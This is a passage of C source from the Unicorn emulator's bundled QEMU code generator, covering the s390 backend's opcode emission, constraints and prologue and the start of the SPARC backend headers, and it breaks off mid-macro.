INDEX_op_add2_i32: if (const_args[4]) { tcg_out_insn(s, RIL, ALFI, args[0], args[4]); } else { tcg_out_insn(s, RR, ALR, args[0], args[4]); } tcg_out_insn(s, RRE, ALCR, args[1], args[5]); break; case INDEX_op_sub2_i32: if (const_args[4]) { tcg_out_insn(s, RIL, SLFI, args[0], args[4]); } else { tcg_out_insn(s, RR, SLR, args[0], args[4]); } tcg_out_insn(s, RRE, SLBR, args[1], args[5]); break; case INDEX_op_br: tgen_branch(s, S390_CC_ALWAYS, arg_label(args[0])); break; case INDEX_op_brcond_i32: tgen_brcond(s, TCG_TYPE_I32, args[2], args[0], args[1], const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i32: tgen_setcond(s, TCG_TYPE_I32, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_movcond_i32: tgen_movcond(s, TCG_TYPE_I32, args[5], args[0], args[1], args[2], const_args[2], args[3], const_args[3]); break; case INDEX_op_qemu_ld_i32: /* ??? Technically we can use a non-extending instruction. 
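That is, for the i32 opcode the high half of the destination is dead, so the extending 64-bit loads emitted by tcg_out_qemu_ld_direct do slightly more than required; sharing a single path with qemu_ld_i64 appears to have been judged the smaller code.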
*/ case INDEX_op_qemu_ld_i64: tcg_out_qemu_ld(s, args[0], args[1], args[2]); break; case INDEX_op_qemu_st_i32: case INDEX_op_qemu_st_i64: tcg_out_qemu_st(s, args[0], args[1], args[2]); break; case INDEX_op_ld16s_i64: tcg_out_mem(s, 0, RXY_LGH, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld32u_i64: tcg_out_mem(s, 0, RXY_LLGF, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld32s_i64: tcg_out_mem(s, 0, RXY_LGF, args[0], args[1], TCG_REG_NONE, args[2]); break; case INDEX_op_ld_i64: tcg_out_ld(s, TCG_TYPE_I64, args[0], args[1], args[2]); break; case INDEX_op_st32_i64: tcg_out_st(s, TCG_TYPE_I32, args[0], args[1], args[2]); break; case INDEX_op_st_i64: tcg_out_st(s, TCG_TYPE_I64, args[0], args[1], args[2]); break; case INDEX_op_add_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { do_addi_64: if (a0 == a1) { if (a2 == (int16_t)a2) { tcg_out_insn(s, RI, AGHI, a0, a2); break; } if (s390_facilities & FACILITY_EXT_IMM) { if (a2 == (int32_t)a2) { tcg_out_insn(s, RIL, AGFI, a0, a2); break; } else if (a2 == (uint32_t)a2) { tcg_out_insn(s, RIL, ALGFI, a0, a2); break; } else if (-a2 == (uint32_t)-a2) { tcg_out_insn(s, RIL, SLGFI, a0, -a2); break; } } } tcg_out_mem(s, RX_LA, RXY_LAY, a0, a1, TCG_REG_NONE, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, AGR, a0, a2); } else { tcg_out_insn(s, RX, LA, a0, a1, a2, 0); } break; case INDEX_op_sub_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { a2 = -a2; goto do_addi_64; } else if (a0 == a1) { tcg_out_insn(s, RRE, SGR, a0, a2); } else { tcg_out_insn(s, RRF, SGRK, a0, a1, a2); } break; case INDEX_op_and_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_andi(s, TCG_TYPE_I64, args[0], args[2]); } else if (a0 == a1) { tcg_out_insn(s, RRE, NGR, args[0], args[2]); } else { tcg_out_insn(s, RRF, NGRK, a0, a1, a2); } break; case INDEX_op_or_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_ori(s, TCG_TYPE_I64, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, OGR, a0, a2); } else { tcg_out_insn(s, RRF, OGRK, a0, a1, a2); } break; case INDEX_op_xor_i64: a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[2]) { tcg_out_mov(s, TCG_TYPE_I64, a0, a1); tgen_xori(s, TCG_TYPE_I64, a0, a2); } else if (a0 == a1) { tcg_out_insn(s, RRE, XGR, a0, a2); } else { tcg_out_insn(s, RRF, XGRK, a0, a1, a2); } break; case INDEX_op_neg_i64: tcg_out_insn(s, RRE, LCGR, args[0], args[1]); break; case INDEX_op_bswap64_i64: tcg_out_insn(s, RRE, LRVGR, args[0], args[1]); break; case INDEX_op_mul_i64: if (const_args[2]) { if (args[2] == (int16_t)args[2]) { tcg_out_insn(s, RI, MGHI, args[0], args[2]); } else { tcg_out_insn(s, RIL, MSGFI, args[0], args[2]); } } else { tcg_out_insn(s, RRE, MSGR, args[0], args[2]); } break; case INDEX_op_div2_i64: /* ??? We get an unnecessary sign-extension of the dividend into R3 with this definition, but as we do in fact always produce both quotient and remainder using INDEX_op_div_i64 instead requires jumping through even more hoops. 
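(As I read the ISA, DSGR takes its 64-bit dividend from the odd register of the even/odd pair, here R3, writing the quotient back to R3 and the remainder to R2; that is why the high half materialized for the 128/64-bit div2 interface goes unused.)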
*/ tcg_out_insn(s, RRE, DSGR, TCG_REG_R2, args[4]); break; case INDEX_op_divu2_i64: tcg_out_insn(s, RRE, DLGR, TCG_REG_R2, args[4]); break; case INDEX_op_mulu2_i64: tcg_out_insn(s, RRE, MLGR, TCG_REG_R2, args[3]); break; case INDEX_op_shl_i64: op = RSY_SLLG; do_shift64: if (const_args[2]) { tcg_out_sh64(s, op, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, op, args[0], args[1], args[2], 0); } break; case INDEX_op_shr_i64: op = RSY_SRLG; goto do_shift64; case INDEX_op_sar_i64: op = RSY_SRAG; goto do_shift64; case INDEX_op_rotl_i64: if (const_args[2]) { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_REG_NONE, args[2]); } else { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], args[2], 0); } break; case INDEX_op_rotr_i64: if (const_args[2]) { tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_REG_NONE, (64 - args[2]) & 63); } else { /* We can use the smaller 32-bit negate because only the low 6 bits are examined for the rotate. */ tcg_out_insn(s, RR, LCR, TCG_TMP0, args[2]); tcg_out_sh64(s, RSY_RLLG, args[0], args[1], TCG_TMP0, 0); } break; case INDEX_op_ext8s_i64: tgen_ext8s(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext16s_i64: tgen_ext16s(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext_i32_i64: case INDEX_op_ext32s_i64: tgen_ext32s(s, args[0], args[1]); break; case INDEX_op_ext8u_i64: tgen_ext8u(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_ext16u_i64: tgen_ext16u(s, TCG_TYPE_I64, args[0], args[1]); break; case INDEX_op_extu_i32_i64: case INDEX_op_ext32u_i64: tgen_ext32u(s, args[0], args[1]); break; case INDEX_op_add2_i64: if (const_args[4]) { if ((int64_t)args[4] >= 0) { tcg_out_insn(s, RIL, ALGFI, args[0], args[4]); } else { tcg_out_insn(s, RIL, SLGFI, args[0], -args[4]); } } else { tcg_out_insn(s, RRE, ALGR, args[0], args[4]); } tcg_out_insn(s, RRE, ALCGR, args[1], args[5]); break; case INDEX_op_sub2_i64: if (const_args[4]) { if ((int64_t)args[4] >= 0) { tcg_out_insn(s, RIL, SLGFI, args[0], args[4]); } else { tcg_out_insn(s, RIL, ALGFI, args[0], -args[4]); } } else { tcg_out_insn(s, RRE, SLGR, args[0], args[4]); } tcg_out_insn(s, RRE, SLBGR, args[1], args[5]); break; case INDEX_op_brcond_i64: tgen_brcond(s, TCG_TYPE_I64, args[2], args[0], args[1], const_args[1], arg_label(args[3])); break; case INDEX_op_setcond_i64: tgen_setcond(s, TCG_TYPE_I64, args[3], args[0], args[1], args[2], const_args[2]); break; case INDEX_op_movcond_i64: tgen_movcond(s, TCG_TYPE_I64, args[5], args[0], args[1], args[2], const_args[2], args[3], const_args[3]); break; OP_32_64(deposit): a0 = args[0], a1 = args[1], a2 = args[2]; if (const_args[1]) { tgen_deposit(s, a0, a2, args[3], args[4], 1); } else { /* Since we can't support "0Z" as a constraint, we allow a1 in any register. Fix things up as if a matching constraint. */ if (a0 != a1) { TCGType type = (opc == INDEX_op_deposit_i64); if (a0 == a2) { tcg_out_mov(s, type, TCG_TMP0, a2); a2 = TCG_TMP0; } tcg_out_mov(s, type, a0, a1); } tgen_deposit(s, a0, a2, args[3], args[4], 0); } break; OP_32_64(extract): tgen_extract(s, args[0], args[1], args[2], args[3]); break; case INDEX_op_clz_i64: tgen_clz(s, args[0], args[1], args[2], const_args[2]); break; case INDEX_op_mb: /* The host memory model is quite strong, we simply need to serialize the instruction stream. */ if (args[0] & TCG_MO_ST_LD) { tcg_out_insn(s, RR, BCR, s390_facilities & FACILITY_FAST_BCR_SER ? 14 : 15, 0); } break; case INDEX_op_mov_i32: /* Always emitted via tcg_out_mov. 
*/ case INDEX_op_mov_i64: case INDEX_op_movi_i32: /* Always emitted via tcg_out_movi. */ case INDEX_op_movi_i64: case INDEX_op_call: /* Always emitted via tcg_out_call. */ default: tcg_abort(); } } static const TCGTargetOpDef *tcg_target_op_def(TCGOpcode op) { static const TCGTargetOpDef r = { .args_ct_str = { "r" } }; static const TCGTargetOpDef r_r = { .args_ct_str = { "r", "r" } }; static const TCGTargetOpDef r_L = { .args_ct_str = { "r", "L" } }; static const TCGTargetOpDef L_L = { .args_ct_str = { "L", "L" } }; static const TCGTargetOpDef r_ri = { .args_ct_str = { "r", "ri" } }; static const TCGTargetOpDef r_r_ri = { .args_ct_str = { "r", "r", "ri" } }; static const TCGTargetOpDef r_0_ri = { .args_ct_str = { "r", "0", "ri" } }; static const TCGTargetOpDef r_0_rI = { .args_ct_str = { "r", "0", "rI" } }; static const TCGTargetOpDef r_0_rJ = { .args_ct_str = { "r", "0", "rJ" } }; static const TCGTargetOpDef a2_r = { .args_ct_str = { "r", "r", "0", "1", "r", "r" } }; static const TCGTargetOpDef a2_ri = { .args_ct_str = { "r", "r", "0", "1", "ri", "r" } }; static const TCGTargetOpDef a2_rA = { .args_ct_str = { "r", "r", "0", "1", "rA", "r" } }; switch (op) { case INDEX_op_goto_ptr: return &r; case INDEX_op_ld8u_i32: case INDEX_op_ld8u_i64: case INDEX_op_ld8s_i32: case INDEX_op_ld8s_i64: case INDEX_op_ld16u_i32: case INDEX_op_ld16u_i64: case INDEX_op_ld16s_i32: case INDEX_op_ld16s_i64: case INDEX_op_ld_i32: case INDEX_op_ld32u_i64: case INDEX_op_ld32s_i64: case INDEX_op_ld_i64: case INDEX_op_st8_i32: case INDEX_op_st8_i64: case INDEX_op_st16_i32: case INDEX_op_st16_i64: case INDEX_op_st_i32: case INDEX_op_st32_i64: case INDEX_op_st_i64: return &r_r; case INDEX_op_add_i32: case INDEX_op_add_i64: return &r_r_ri; case INDEX_op_sub_i32: case INDEX_op_sub_i64: case INDEX_op_and_i32: case INDEX_op_and_i64: case INDEX_op_or_i32: case INDEX_op_or_i64: case INDEX_op_xor_i32: case INDEX_op_xor_i64: return (s390_facilities & FACILITY_DISTINCT_OPS ? &r_r_ri : &r_0_ri); case INDEX_op_mul_i32: /* If we have the general-instruction-extensions, then we have MULTIPLY SINGLE IMMEDIATE with a signed 32-bit, otherwise we have only MULTIPLY HALFWORD IMMEDIATE, with a signed 16-bit. */ return (s390_facilities & FACILITY_GEN_INST_EXT ? &r_0_ri : &r_0_rI); case INDEX_op_mul_i64: return (s390_facilities & FACILITY_GEN_INST_EXT ? &r_0_rJ : &r_0_rI); case INDEX_op_shl_i32: case INDEX_op_shr_i32: case INDEX_op_sar_i32: return (s390_facilities & FACILITY_DISTINCT_OPS ? 
&r_r_ri : &r_0_ri); case INDEX_op_shl_i64: case INDEX_op_shr_i64: case INDEX_op_sar_i64: return &r_r_ri; case INDEX_op_rotl_i32: case INDEX_op_rotl_i64: case INDEX_op_rotr_i32: case INDEX_op_rotr_i64: return &r_r_ri; case INDEX_op_brcond_i32: case INDEX_op_brcond_i64: return &r_ri; case INDEX_op_bswap16_i32: case INDEX_op_bswap16_i64: case INDEX_op_bswap32_i32: case INDEX_op_bswap32_i64: case INDEX_op_bswap64_i64: case INDEX_op_neg_i32: case INDEX_op_neg_i64: case INDEX_op_ext8s_i32: case INDEX_op_ext8s_i64: case INDEX_op_ext8u_i32: case INDEX_op_ext8u_i64: case INDEX_op_ext16s_i32: case INDEX_op_ext16s_i64: case INDEX_op_ext16u_i32: case INDEX_op_ext16u_i64: case INDEX_op_ext32s_i64: case INDEX_op_ext32u_i64: case INDEX_op_ext_i32_i64: case INDEX_op_extu_i32_i64: case INDEX_op_extract_i32: case INDEX_op_extract_i64: return &r_r; case INDEX_op_clz_i64: case INDEX_op_setcond_i32: case INDEX_op_setcond_i64: return &r_r_ri; case INDEX_op_qemu_ld_i32: case INDEX_op_qemu_ld_i64: return &r_L; case INDEX_op_qemu_st_i64: case INDEX_op_qemu_st_i32: return &L_L; case INDEX_op_deposit_i32: case INDEX_op_deposit_i64: { static const TCGTargetOpDef dep = { .args_ct_str = { "r", "rZ", "r" } }; return &dep; } case INDEX_op_movcond_i32: case INDEX_op_movcond_i64: { static const TCGTargetOpDef movc = { .args_ct_str = { "r", "r", "ri", "r", "0" } }; static const TCGTargetOpDef movc_l = { .args_ct_str = { "r", "r", "ri", "rI", "0" } }; return (s390_facilities & FACILITY_LOAD_ON_COND2 ? &movc_l : &movc); } case INDEX_op_div2_i32: case INDEX_op_div2_i64: case INDEX_op_divu2_i32: case INDEX_op_divu2_i64: { static const TCGTargetOpDef div2 = { .args_ct_str = { "b", "a", "0", "1", "r" } }; return &div2; } case INDEX_op_mulu2_i64: { static const TCGTargetOpDef mul2 = { .args_ct_str = { "b", "a", "0", "r" } }; return &mul2; } case INDEX_op_add2_i32: case INDEX_op_sub2_i32: return (s390_facilities & FACILITY_EXT_IMM ? &a2_ri : &a2_r); case INDEX_op_add2_i64: case INDEX_op_sub2_i64: return (s390_facilities & FACILITY_EXT_IMM ? &a2_rA : &a2_r); default: break; } return NULL; } static void query_s390_facilities(void) { unsigned long hwcap = qemu_getauxval(AT_HWCAP); /* Is STORE FACILITY LIST EXTENDED available? Honestly, I believe this is present on all 64-bit systems, but let's check for it anyway. */ if (hwcap & HWCAP_S390_STFLE) { register int r0 __asm__("0"); register void *r1 __asm__("1"); /* stfle 0(%r1) */ r1 = &s390_facilities; asm volatile(".word 0xb2b0,0x1000" : "=r"(r0) : "0"(0), "r"(r1) : "memory", "cc"); } } static void tcg_target_init(TCGContext *s) { query_s390_facilities(); s->tcg_target_available_regs[TCG_TYPE_I32] = 0xffff; s->tcg_target_available_regs[TCG_TYPE_I64] = 0xffff; s->tcg_target_call_clobber_regs = 0; tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4); tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5); /* The r6 register is technically call-saved, but it's also a parameter register, so it can get killed by setup for the qemu_st helper. */ tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6); /* The return register can be considered call-clobbered. 
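Every call emitted by tcg_out_call goes through BRASL or BASR with %r14 as the link register, so whatever the register held before a helper call is gone afterwards.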
*/ tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); s->reserved_regs = 0; tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); /* XXX many insns can't be used with R0, so we better avoid it for now */ tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); if (USE_REG_TB) { tcg_regset_set_reg(s->reserved_regs, TCG_REG_TB); } } #define FRAME_SIZE ((int)(TCG_TARGET_CALL_STACK_OFFSET \ + TCG_STATIC_CALL_ARGS_SIZE \ + CPU_TEMP_BUF_NLONGS * sizeof(long))) static void tcg_target_qemu_prologue(TCGContext *s) { /* stmg %r6,%r15,48(%r15) (save registers) */ tcg_out_insn(s, RXY, STMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, 48); /* aghi %r15,-frame_size */ tcg_out_insn(s, RI, AGHI, TCG_REG_R15, -FRAME_SIZE); tcg_set_frame(s, TCG_REG_CALL_STACK, TCG_STATIC_CALL_ARGS_SIZE + TCG_TARGET_CALL_STACK_OFFSET, CPU_TEMP_BUF_NLONGS * sizeof(long)); #ifndef CONFIG_SOFTMMU if (guest_base >= 0x80000) { tcg_out_movi_int(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, guest_base, true); tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); } #endif tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); if (USE_REG_TB) { tcg_out_mov(s, TCG_TYPE_PTR, TCG_REG_TB, tcg_target_call_iarg_regs[1]); } /* br %r3 (go to TB) */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, tcg_target_call_iarg_regs[1]); /* * Return path for goto_ptr. Set return value to 0, a-la exit_tb, * and fall through to the rest of the epilogue. */ s->code_gen_epilogue = s->code_ptr; tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R2, 0); /* TB epilogue */ tb_ret_addr = s->code_ptr; /* lmg %r6,%r15,fs+48(%r15) (restore registers) */ tcg_out_insn(s, RXY, LMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, FRAME_SIZE + 48); /* br %r14 (return) */ tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_R14); } static void tcg_out_nop_fill(tcg_insn_unit *p, int count) { memset(p, 0x07, count * sizeof(tcg_insn_unit)); } typedef struct { DebugFrameHeader h; uint8_t fde_def_cfa[4]; uint8_t fde_reg_ofs[18]; } DebugFrame; /* We're expecting a 2 byte uleb128 encoded value. */ QEMU_BUILD_BUG_ON(FRAME_SIZE >= (1 << 14)); #define ELF_HOST_MACHINE EM_S390 static const DebugFrame debug_frame = { .h.cie.len = sizeof(DebugFrameCIE)-4, /* length after .len member */ .h.cie.id = -1, .h.cie.version = 1, .h.cie.code_align = 1, .h.cie.data_align = 8, /* sleb128 8 */ .h.cie.return_column = TCG_REG_R14, /* Total FDE size does not include the "len" member. */ .h.fde.len = sizeof(DebugFrame) - offsetof(DebugFrame, h.fde.cie_offset), .fde_def_cfa = { 12, TCG_REG_CALL_STACK, /* DW_CFA_def_cfa %r15, ... */ (FRAME_SIZE & 0x7f) | 0x80, /* ... 
uleb128 FRAME_SIZE */ (FRAME_SIZE >> 7) }, .fde_reg_ofs = { 0x86, 6, /* DW_CFA_offset, %r6, 48 */ 0x87, 7, /* DW_CFA_offset, %r7, 56 */ 0x88, 8, /* DW_CFA_offset, %r8, 64 */ 0x89, 9, /* DW_CFA_offset, %r9, 72 */ 0x8a, 10, /* DW_CFA_offset, %r10, 80 */ 0x8b, 11, /* DW_CFA_offset, %r11, 88 */ 0x8c, 12, /* DW_CFA_offset, %r12, 96 */ 0x8d, 13, /* DW_CFA_offset, %r13, 104 */ 0x8e, 14, /* DW_CFA_offset, %r14, 112 */ } }; void tcg_register_jit(TCGContext *s, void *buf, size_t buf_size) { tcg_register_jit_int(s, buf, buf_size, &debug_frame, sizeof(debug_frame)); }
unicorn-2.1.1/qemu/tcg/sparc/
unicorn-2.1.1/qemu/tcg/sparc/tcg-target.h
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE.
*/ #ifndef SPARC_TCG_TARGET_H #define SPARC_TCG_TARGET_H #define TCG_TARGET_REG_BITS 64 #define TCG_TARGET_INSN_UNIT_SIZE 4 #define TCG_TARGET_TLB_DISPLACEMENT_BITS 32 #define TCG_TARGET_NB_REGS 32 typedef enum { TCG_REG_G0 = 0, TCG_REG_G1, TCG_REG_G2, TCG_REG_G3, TCG_REG_G4, TCG_REG_G5, TCG_REG_G6, TCG_REG_G7, TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, TCG_REG_O6, TCG_REG_O7, TCG_REG_L0, TCG_REG_L1, TCG_REG_L2, TCG_REG_L3, TCG_REG_L4, TCG_REG_L5, TCG_REG_L6, TCG_REG_L7, TCG_REG_I0, TCG_REG_I1, TCG_REG_I2, TCG_REG_I3, TCG_REG_I4, TCG_REG_I5, TCG_REG_I6, TCG_REG_I7, } TCGReg; #define TCG_CT_CONST_S11 0x100 #define TCG_CT_CONST_S13 0x200 #define TCG_CT_CONST_ZERO 0x400 /* used for function call generation */ #define TCG_REG_CALL_STACK TCG_REG_O6 #ifdef __arch64__ #define TCG_TARGET_STACK_BIAS 2047 #define TCG_TARGET_STACK_ALIGN 16 #define TCG_TARGET_CALL_STACK_OFFSET (128 + 6*8 + TCG_TARGET_STACK_BIAS) #else #define TCG_TARGET_STACK_BIAS 0 #define TCG_TARGET_STACK_ALIGN 8 #define TCG_TARGET_CALL_STACK_OFFSET (64 + 4 + 6*4) #endif #ifdef __arch64__ #define TCG_TARGET_EXTEND_ARGS 1 #endif #if defined(__VIS__) && __VIS__ >= 0x300 #define use_vis3_instructions 1 #else extern bool use_vis3_instructions; #endif /* optional instructions */ #define TCG_TARGET_HAS_div_i32 1 #define TCG_TARGET_HAS_rem_i32 0 #define TCG_TARGET_HAS_rot_i32 0 #define TCG_TARGET_HAS_ext8s_i32 0 #define TCG_TARGET_HAS_ext16s_i32 0 #define TCG_TARGET_HAS_ext8u_i32 0 #define TCG_TARGET_HAS_ext16u_i32 0 #define TCG_TARGET_HAS_bswap16_i32 0 #define TCG_TARGET_HAS_bswap32_i32 0 #define TCG_TARGET_HAS_neg_i32 1 #define TCG_TARGET_HAS_not_i32 1 #define TCG_TARGET_HAS_andc_i32 1 #define TCG_TARGET_HAS_orc_i32 1 #define TCG_TARGET_HAS_eqv_i32 0 #define TCG_TARGET_HAS_nand_i32 0 #define TCG_TARGET_HAS_nor_i32 0 #define TCG_TARGET_HAS_clz_i32 0 #define TCG_TARGET_HAS_ctz_i32 0 #define TCG_TARGET_HAS_ctpop_i32 0 #define TCG_TARGET_HAS_deposit_i32 0 #define TCG_TARGET_HAS_extract_i32 0 #define TCG_TARGET_HAS_sextract_i32 0 #define TCG_TARGET_HAS_extract2_i32 0 #define TCG_TARGET_HAS_movcond_i32 1 #define TCG_TARGET_HAS_add2_i32 1 #define TCG_TARGET_HAS_sub2_i32 1 #define TCG_TARGET_HAS_mulu2_i32 1 #define TCG_TARGET_HAS_muls2_i32 1 #define TCG_TARGET_HAS_muluh_i32 0 #define TCG_TARGET_HAS_mulsh_i32 0 #define TCG_TARGET_HAS_goto_ptr 1 #define TCG_TARGET_HAS_direct_jump 1 #define TCG_TARGET_HAS_extrl_i64_i32 1 #define TCG_TARGET_HAS_extrh_i64_i32 1 #define TCG_TARGET_HAS_div_i64 1 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_ext8s_i64 0 #define TCG_TARGET_HAS_ext16s_i64 0 #define TCG_TARGET_HAS_ext32s_i64 1 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 1 #define TCG_TARGET_HAS_bswap16_i64 0 #define TCG_TARGET_HAS_bswap32_i64 0 #define TCG_TARGET_HAS_bswap64_i64 0 #define TCG_TARGET_HAS_neg_i64 1 #define TCG_TARGET_HAS_not_i64 1 #define TCG_TARGET_HAS_andc_i64 1 #define TCG_TARGET_HAS_orc_i64 1 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 0 #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define TCG_TARGET_HAS_extract_i64 0 #define TCG_TARGET_HAS_sextract_i64 0 #define TCG_TARGET_HAS_extract2_i64 0 #define TCG_TARGET_HAS_movcond_i64 1 #define TCG_TARGET_HAS_add2_i64 1 #define TCG_TARGET_HAS_sub2_i64 1 #define TCG_TARGET_HAS_mulu2_i64 0 #define TCG_TARGET_HAS_muls2_i64 
0 #define TCG_TARGET_HAS_muluh_i64 use_vis3_instructions #define TCG_TARGET_HAS_mulsh_i64 0 #define TCG_AREG0 TCG_REG_I0 #define TCG_TARGET_DEFAULT_MO (0) #define TCG_TARGET_HAS_MEMORY_BSWAP 1 static inline void flush_icache_range(uintptr_t start, uintptr_t stop) { uintptr_t p; for (p = start & -8; p < ((stop + 7) & -8); p += 8) { __asm__ __volatile__("flush\t%0" : : "r" (p)); } } void tb_target_set_jmp_target(uintptr_t, uintptr_t, uintptr_t); #define TCG_TARGET_NEED_POOL_LABELS #endif
unicorn-2.1.1/qemu/tcg/sparc/tcg-target.inc.c
/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #include "../tcg-pool.inc.c" #ifdef CONFIG_DEBUG_TCG static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { "%g0", "%g1", "%g2", "%g3", "%g4", "%g5", "%g6", "%g7", "%o0", "%o1", "%o2", "%o3", "%o4", "%o5", "%o6", "%o7", "%l0", "%l1", "%l2", "%l3", "%l4", "%l5", "%l6", "%l7", "%i0", "%i1", "%i2", "%i3", "%i4", "%i5", "%i6", "%i7", }; #endif #ifdef __arch64__ # define SPARC64 1 #else # define SPARC64 0 #endif /* Note that sparcv8plus can only hold 64 bit quantities in %g and %o registers. These are saved manually by the kernel in full 64-bit slots. The %i and %l registers are saved by the register window mechanism, which only allocates space for 32 bits. Given that this window spill/fill can happen on any signal, we must consider the high bits of the %i and %l registers garbage at all times. */ #if SPARC64 # define ALL_64 0xffffffffu #else # define ALL_64 0xffffu #endif /* Define some temporary registers. T2 is used for constant generation.
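(T2 is %o7, which the CALL and JMPL sequences in tcg_out_call_nodelay also use for the return address, so it is only usable as a scratch between calls.)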
*/ #define TCG_REG_T1 TCG_REG_G1 #define TCG_REG_T2 TCG_REG_O7 #ifndef CONFIG_SOFTMMU # define TCG_GUEST_BASE_REG TCG_REG_I5 #endif #define TCG_REG_TB TCG_REG_I1 #define USE_REG_TB (sizeof(void *) > 4) static const int tcg_target_reg_alloc_order[] = { TCG_REG_L0, TCG_REG_L1, TCG_REG_L2, TCG_REG_L3, TCG_REG_L4, TCG_REG_L5, TCG_REG_L6, TCG_REG_L7, TCG_REG_I0, TCG_REG_I1, TCG_REG_I2, TCG_REG_I3, TCG_REG_I4, TCG_REG_I5, TCG_REG_G2, TCG_REG_G3, TCG_REG_G4, TCG_REG_G5, TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, }; static const int tcg_target_call_iarg_regs[6] = { TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, TCG_REG_O4, TCG_REG_O5, }; static const int tcg_target_call_oarg_regs[] = { TCG_REG_O0, TCG_REG_O1, TCG_REG_O2, TCG_REG_O3, }; #define INSN_OP(x) ((x) << 30) #define INSN_OP2(x) ((x) << 22) #define INSN_OP3(x) ((x) << 19) #define INSN_OPF(x) ((x) << 5) #define INSN_RD(x) ((x) << 25) #define INSN_RS1(x) ((x) << 14) #define INSN_RS2(x) (x) #define INSN_ASI(x) ((x) << 5) #define INSN_IMM10(x) ((1 << 13) | ((x) & 